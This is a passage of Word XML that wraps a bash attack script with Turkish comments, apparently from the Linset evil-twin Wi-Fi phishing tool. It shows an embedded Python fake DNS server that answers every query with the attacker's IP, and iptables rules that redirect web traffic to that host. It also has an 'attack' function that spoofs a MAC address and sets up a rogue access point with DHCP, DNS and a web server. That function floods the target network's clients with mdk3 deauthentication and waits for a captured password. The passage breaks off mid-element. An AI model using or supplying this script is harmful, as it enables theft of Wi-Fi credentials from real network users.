    <w:p w14:paraId="0B32C88E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    if tipo == 0:                     # Standard query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3644B293" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      ini=12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048373B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      lon=ord(data[ini])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB03CE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      while lon != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CDC4E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>self.dominio+=data[ini+1:ini+lon+1]+'.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52070424" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ini+=lon+1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236C473" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>lon=ord(data[ini])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B54C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="459050CD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  def respuesta(self, ip):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C78A1A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    packet=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADDC9E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    if self.dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399754AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+=self.data[:2] + \"\x81\x80\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D981556" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'   # Numero preg y respuestas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E776FB0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+=self.data[12:]                                         # Nombre de dominio original</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57049F0F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+='\xc0\x0c'                                             # Puntero al nombre de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6756E068" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'             # Tipo respuesta, ttl, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEBED72" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # La ip en hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800E4F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    return packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755C9432" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7BAE3267" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D09D84" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  ip='$IP'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3237B3C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  print 'pyminifakeDNS:: dom.query. 60 IN A %s' % ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8EFE7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="72182823" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C8C1E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  udps.bind(('',53))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C35FB5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B83B6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38B89A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    while 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EE3D5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      data, addr = udps.recvfrom(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C472DD5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      p=DNSQuery(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B61AD9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      udps.sendto(p.respuesta(ip), addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3230C1D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">      print 'Respuesta: %s -&gt; %s' % (p.dominio, ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138901C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">  except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A157993" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    print 'Finalizando'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5A6CF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t xml:space="preserve">    udps.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D4C0F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>" &gt;$DUMP_PATH/fakedns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9BB4D7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>chmod +x $DUMP_PATH/fakedns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03756A56" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D0AA2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0DB4D4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3ADF09E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Bir DHCP / WEB sunucusu kurmak için yönlendirme tablolarını hazırlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B9114" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function routear {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A495B8C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49D4F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ifconfig $interfaceroutear up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7AD52E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>ifconfig $interfaceroutear $IP netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550FEF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F51CE27" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>route add -net $RANG_IP.0 netmask 255.255.255.0 gw $IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E7D25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "1" &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F3B927" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812D64D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B4063D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --table nat --flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766029D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --delete-chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6231716C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables --table nat --delete-chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD91A1F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -P FORWARD ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBE198" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A3EE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $IP:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B6CEC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination $IP:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E6722" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -A INPUT -p tcp --sport 443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0507758C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A352872" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>iptables -t nat -A POSTROUTING -j MASQUERADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345D53D0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B652774" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="72A7859F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Saldırıyı gerçekleştirin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE27F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function attack {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0FE44E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B6594E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$fakeapmode" = "hostapd" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8CDE6C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>interfaceroutear=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DD450" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>elif [ "$fakeapmode" = "airbase-ng" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106DD4D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>interfaceroutear=at0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F649D73" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F933BF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043009A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>handshakecheck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157AE219" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>nomac=$(tr -dc A-F0-9 &lt; /dev/urandom | fold -w2 |head -n100 | grep -v "${mac:13:1}" | head -c 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26409DDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F51DC0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$fakeapmode" = "hostapd" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318308E5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF9113C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ifconfig $WIFI down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016EEAF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF78C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>macchanger --mac=${mac::13}$nomac${mac:14:4} $WIFI &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645955E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240DF5F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ifconfig $WIFI up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC62DA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sleep 0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D26052" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC5FEE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0F14F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6342B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ $fakeapmode = "hostapd" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC58F9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall hostapd &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377E0BF8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ" -e hostapd $DUMP_PATH/hostapd.conf &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DF5D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>elif [ $fakeapmode = "airbase-ng" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC5321" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall airbase-ng &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743DEABB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xterm $BOTTOMRIGHT -bg "#000000" -fg "#FFFFFF" -title "SAHTE AĞ ATAĞI" -e airbase-ng -P -e $Host_SSID -c $Host_CHAN -a ${mac::13}$nomac${mac:14:4} $WIFI_MONITOR &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06630EA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21360D4A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A88396" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCD1B5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>routear &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495D9C7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D09D02" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="452416EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FE9E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>killall dhcpd &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CDCB1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm -bg black -fg green $TOPLEFT -T DHCP -e "dhcpd -d -f -cf "$DUMP_PATH/dhcpd.conf" $interfaceroutear 2&gt;&amp;1 | tee -a $DUMP_PATH/clientes.txt" &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B5EB9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall $(netstat -lnptu | grep ":53" | grep "LISTEN" | awk '{print $7}' | cut -d "/" -f 2) &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEDB2C0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "SAHTE DNS" -e python $DUMP_PATH/fakedns &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF5DE6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F1F4A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall $(netstat -lnptu | grep ":80" | grep "LISTEN" | awk '{print $7}' | cut -d "/" -f 2) &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42A78B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>lighttpd -f $DUMP_PATH/lighttpd.conf &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E225E48" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787C161" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall aireplay-ng &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E127C2F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>killall mdk3 &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632D7AA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "$(strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1)" &gt;$DUMP_PATH/mdk3.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27885E44" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35951173" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "MDK3 ATAĞI $Host_SSID" -e mdk3 $WIFI_MONITOR2 d -b $DUMP_PATH/mdk3.txt -c 1,2,3,4,5,6,7,8,9,10,11,12,13 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CB2BD7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DA063" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>xterm -hold $TOPRIGHT -title "PAROLA BEKLENİYOR" -e $DUMP_PATH/handcheck &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDEC22B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
